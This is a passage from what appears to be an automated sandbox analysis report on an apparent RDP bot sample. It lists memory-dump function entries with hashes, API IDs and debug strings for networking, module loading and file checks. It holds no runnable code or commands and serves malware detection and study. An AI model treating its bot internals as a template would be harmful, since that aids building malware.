                                                                                                                  • Instruction Fuzzy Hash: C7115175B0CA4296F3209B57F40017A6661BF9AB74F2042B7E96D87AB4DF7CD5098B00
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                  • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                                                                                  • API String ID: 1729277954-887953274
                                                                                                                  • Opcode ID: d543737f11dd21b1b477dccb31d85866533beeb0c3f258185a6ae76c08a64724
                                                                                                                  • Instruction ID: 1ac662a3233e566a3776c4093e53456afac0bcefe206ce85218e3a0a5858849e
                                                                                                                  • Opcode Fuzzy Hash: d543737f11dd21b1b477dccb31d85866533beeb0c3f258185a6ae76c08a64724
                                                                                                                  • Instruction Fuzzy Hash: C411C871B18D4286F350AB57F80007A6665EF88774F104275EA6E83BB5DFBCD549CB00
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                  • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                                                                                  • API String ID: 1729277954-887953274
                                                                                                                  • Opcode ID: 965785d7ab7d92e0704bde05fb8876d09001233a2ee5dad71bbbf6162b0393d8
                                                                                                                  • Instruction ID: f7283f629b7c5daacf95ceda7177fd133839d824f97f78351d3dad6f755dc1cd
                                                                                                                  • Opcode Fuzzy Hash: 965785d7ab7d92e0704bde05fb8876d09001233a2ee5dad71bbbf6162b0393d8
                                                                                                                  • Instruction Fuzzy Hash: 7011B671A1C94286E710AB9BEC00567AAA4FF887A4F505271EA6D837F4DF7CD5068B01
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • [D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s)), xrefs: 00007FFE126E34BE
                                                                                                                  • routine_tx, xrefs: 00007FFE126E34B7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$EnterHeapLeave$FreeProcess
                                                                                                                  • String ID: [D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
                                                                                                                  • API String ID: 2539320189-3555278722
                                                                                                                  • Opcode ID: 2b663758171c4e92e9570753953ef0af31ed0ceed0f3b414d587b6583ec3f0d2
                                                                                                                  • Instruction ID: f63239d53df6302601dff8d89a96f400b6e015790980b8dbc430ac066f5fc7c2
                                                                                                                  • Opcode Fuzzy Hash: 2b663758171c4e92e9570753953ef0af31ed0ceed0f3b414d587b6583ec3f0d2
                                                                                                                  • Instruction Fuzzy Hash: FF310635A08E5282EB21CF13EC906B973A0EF48BA0F1441B5CA5E47AF4DFBCE9518744
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep
                                                                                                                  • String ID: /$[W] (%s) -> Not a valid event received(size=%u,suid=%llx,packed_event_sz=%u,event_sz=%u)$[W] (%s) -> Not a valid packet received(size=%u,suid=%llx)$routine_rx
                                                                                                                  • API String ID: 3472027048-1600310168
                                                                                                                  • Opcode ID: 76f63b9c4d32c1da9ed52c17c6667bf174d282640c69c228af9d6623c514ec68
                                                                                                                  • Instruction ID: c6ff08a037460a38fa4d5dd4a58e11044f30583a979916060f33db3109887c30
                                                                                                                  • Opcode Fuzzy Hash: 76f63b9c4d32c1da9ed52c17c6667bf174d282640c69c228af9d6623c514ec68
                                                                                                                  • Instruction Fuzzy Hash: 00513E21F0CE43C5FA208BD7A4403BA2262AF96FB9F5042F7D85E466F6DE6CE4458741
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                  • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                                                                                                  • API String ID: 1799206407-4111913120
                                                                                                                  • Opcode ID: 9fef411c49d08bf23692d8efbd1792ddd3cc6b80d54de3a2e0922cbe23a56c42
                                                                                                                  • Instruction ID: d9fb568e7357cdff8187b1a936c06c3d03c2d43cb0a090e3ba9c605e1e880dc9
                                                                                                                  • Opcode Fuzzy Hash: 9fef411c49d08bf23692d8efbd1792ddd3cc6b80d54de3a2e0922cbe23a56c42
                                                                                                                  • Instruction Fuzzy Hash: 2D21A3B0E1C5C382FB60AE689494B7DD1525F40369FE44533E80E8B6E0CE9DF8869262
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                  • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                                                                                                  • API String ID: 1799206407-4111913120
                                                                                                                  • Opcode ID: 97c17c4cf84dc7a2fcad4bebec9ba3579fbf900d4b77be3971ef5b5e49f30029
                                                                                                                  • Instruction ID: f4950cf95624ddd5995d9556e6d80c86bad95574abaa6ddf6bbcc7234e4ba1a0
                                                                                                                  • Opcode Fuzzy Hash: 97c17c4cf84dc7a2fcad4bebec9ba3579fbf900d4b77be3971ef5b5e49f30029
                                                                                                                  • Instruction Fuzzy Hash: 8B21D610F0DD43C2FB244AEA954477922429F12BBDFA445F3D50F8A1B0DE1CB8859642
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                  • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                                                                                                  • API String ID: 1799206407-4111913120
                                                                                                                  • Opcode ID: 5791759264d75a3a417900a43a506217477ce90d88af35a370718004647d8d75
                                                                                                                  • Instruction ID: bdbfcf5ee682757445da6942159dfe1d88cd1ab64e0e33dc45ea36ca3933022f
                                                                                                                  • Opcode Fuzzy Hash: 5791759264d75a3a417900a43a506217477ce90d88af35a370718004647d8d75
                                                                                                                  • Instruction Fuzzy Hash: 6621E770E0CC9382FB2446DAAE48B7F91599F02735FA465B2E40E8A1F1CF5CFC859246
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastrecv
                                                                                                                  • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                                                                                  • API String ID: 2514157807-65069805
                                                                                                                  • Opcode ID: 0e96e8ceabe4403754de825ae533e2122814fe55cf48ca520f1a4bc828f32c8d
                                                                                                                  • Instruction ID: 519e7b87ac0f09cfdb0f8408aca22e92d211060b493e009d0c07fdb0b872213c
                                                                                                                  • Opcode Fuzzy Hash: 0e96e8ceabe4403754de825ae533e2122814fe55cf48ca520f1a4bc828f32c8d
                                                                                                                  • Instruction Fuzzy Hash: 56115B60A0ED07D1EB399F17AA51EF812586F067B8F4033B4D82D8B6F1EE1CE9468300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastrecv
                                                                                                                  • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                                                                                  • API String ID: 2514157807-65069805
                                                                                                                  • Opcode ID: 20376f6619c6d822e54e35a81bb48bf82f03e739518884b6c6ac296e179b3acf
                                                                                                                  • Instruction ID: 0453fb183b074e5b873558717156011bbba413495f8573f56bcaffa7ac2ff534
                                                                                                                  • Opcode Fuzzy Hash: 20376f6619c6d822e54e35a81bb48bf82f03e739518884b6c6ac296e179b3acf
                                                                                                                  • Instruction Fuzzy Hash: 20115B94B1CE4781F510571EAD402BA1250AF42FB2F5027F7DD2E46AF7DE1CA5668300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastrecv
                                                                                                                  • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                                                                                  • API String ID: 2514157807-65069805
                                                                                                                  • Opcode ID: 9e45e7a5b1ac50202730f57c7db92283bb32a8ce1dd8794b84b20adfad986958
                                                                                                                  • Instruction ID: 21964bd779bc3d01e1aed92f2361f058866c51f78a33d721dfb4a7306ad1a2fc
                                                                                                                  • Opcode Fuzzy Hash: 9e45e7a5b1ac50202730f57c7db92283bb32a8ce1dd8794b84b20adfad986958
                                                                                                                  • Instruction Fuzzy Hash: CB11A050A4CE4749FA10A327AC60AB81242AF457B4F4043B0EC2D8B6FAEFDCA946C301
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastrecv
                                                                                                                  • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                                                                                  • API String ID: 2514157807-65069805
                                                                                                                  • Opcode ID: cd545afe0dfbfab50491b437540348ee56eb87e0698422783fa0cfa3d5bf48f5
                                                                                                                  • Instruction ID: 20a44901dd7018f25cea5f649d9c2d71df403690177191f709fc47478fc7f1da
                                                                                                                  • Opcode Fuzzy Hash: cd545afe0dfbfab50491b437540348ee56eb87e0698422783fa0cfa3d5bf48f5
                                                                                                                  • Instruction Fuzzy Hash: AE115E6CF0CE1681F6105757A84027626526FE7FB4F5013F7D82DA65F3EE2CA5868300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastrecv
                                                                                                                  • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                                                                                  • API String ID: 2514157807-65069805
                                                                                                                  • Opcode ID: 0a37630b3d380bdfb3f3fd602d5d7a95be8cc216344c10ecf61644671f1c9a02
                                                                                                                  • Instruction ID: c1234c4bba00ae3bf777ca1c4c50d7e5f42740b075ed20207bd49dda22ee1675
                                                                                                                  • Opcode Fuzzy Hash: 0a37630b3d380bdfb3f3fd602d5d7a95be8cc216344c10ecf61644671f1c9a02
                                                                                                                  • Instruction Fuzzy Hash: A5116A90F0CD5351EB20A7A6AC503BB1248AF107B0F8053B0D92E9AAF1EE1CF9068302
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(?,?,service,00000157C50713D0,00007FF7C1AB2910), ref: 00007FF7C1AB2312
                                                                                                                  • GetLastError.KERNEL32(?,?,service,00000157C50713D0,00007FF7C1AB2910), ref: 00007FF7C1AB233E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load$service
                                                                                                                  • API String ID: 4085810780-4145076245
                                                                                                                  • Opcode ID: 5d0b695f5852fddfa45d31afa1b32bc7747efdcaaaff0dc5d86f6010d106ca8b
                                                                                                                  • Instruction ID: 87aca54ebc00fb2f09ece82aa0eaf4b2c518eb14639e1bfc7fb2ac2a897d9d2d
                                                                                                                  • Opcode Fuzzy Hash: 5d0b695f5852fddfa45d31afa1b32bc7747efdcaaaff0dc5d86f6010d106ca8b
                                                                                                                  • Instruction Fuzzy Hash: 94F03A64A0A69780FB61FF5AA860CBCA6506F55BA8BC81133CC0C17751EEEDB586C320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Startupfflushfwrite
                                                                                                                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                                                                                  • API String ID: 3771387389-898331216
                                                                                                                  • Opcode ID: 5867243fe78a8a9678cdcbe041f3a43d3773ff52e058a36803f4b046501692db
                                                                                                                  • Instruction ID: 272849c21ba807fdb220101a00c9d38687555604b0a553bc5bc31b2ce2eea036
                                                                                                                  • Opcode Fuzzy Hash: 5867243fe78a8a9678cdcbe041f3a43d3773ff52e058a36803f4b046501692db
                                                                                                                  • Instruction Fuzzy Hash: 82F04960B5EC02C1FF319F12E941FF95218AF003A8F4820BAC44E4A6B1EE5DE548C320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Startupfflushfwrite
                                                                                                                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                                                                                  • API String ID: 3771387389-898331216
                                                                                                                  • Opcode ID: 773791ad71c4f052d927a098ad043227365c511ca79b2662575fb19291f87604
                                                                                                                  • Instruction ID: 6ccf72e08f831e918672014a46c37a50572e5fb2e601f24758023ee82e7c6c68
                                                                                                                  • Opcode Fuzzy Hash: 773791ad71c4f052d927a098ad043227365c511ca79b2662575fb19291f87604
                                                                                                                  • Instruction Fuzzy Hash: C7F01D60B0CD4791FB109B1AED453FA1210AF12FB9F4410F7D94E466B7EE1CE5599700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
